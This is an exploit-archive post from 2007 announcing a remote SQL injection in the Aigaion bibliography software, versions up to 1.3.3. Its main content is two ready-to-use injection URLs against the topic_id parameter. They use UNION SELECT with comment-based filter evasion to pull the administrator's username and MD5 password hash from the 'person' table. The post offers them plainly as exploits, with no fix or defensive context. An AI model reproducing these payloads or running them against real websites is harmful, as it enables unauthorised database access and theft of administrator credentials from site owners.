Aigaion <= 1.3.3 (topic topic_id) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Aigaion <= 1.3.3 (topic topic_id) Remote SQL Injection Vulnerability
# Published : 2007-07-09
# Author : CypherXero
# Previous Title : Mail Machine <= 3.989 Local File Inclusion Exploit
# Next Title : FlashGameScript <= 1.7 (user) Remote SQL Injection Vulnerability

--==+================================================================================+==--
--==+                       Aigaion <= 1.3.3 SQL Injection Exploit                   +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net

Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--

EXPLOITS:

http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,CONCAT(login,CHAR(58),password),null/**/FROM/**/person/**/WHERE/**/ID=1--
http://www.website.com/index.php?page=topic&topic_id=9999/**/UNION/**/SELECT/**/ALL/**/null,null,password,null/**/FROM/**/person--

# www.Syue.com [2007-07-09]